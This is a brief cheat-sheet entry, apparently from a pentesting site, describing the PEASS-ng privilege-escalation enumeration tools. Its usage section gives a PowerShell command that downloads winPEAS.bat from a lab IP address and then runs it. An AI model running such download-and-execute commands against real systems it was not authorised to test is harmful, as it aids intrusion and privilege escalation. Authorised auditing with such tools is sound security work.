Skip to content

PEASS-ng

Description

These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.

Usage

IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.9/winPEAS.bat', 'winPEAS.bat')

.\winPEAS.bat

References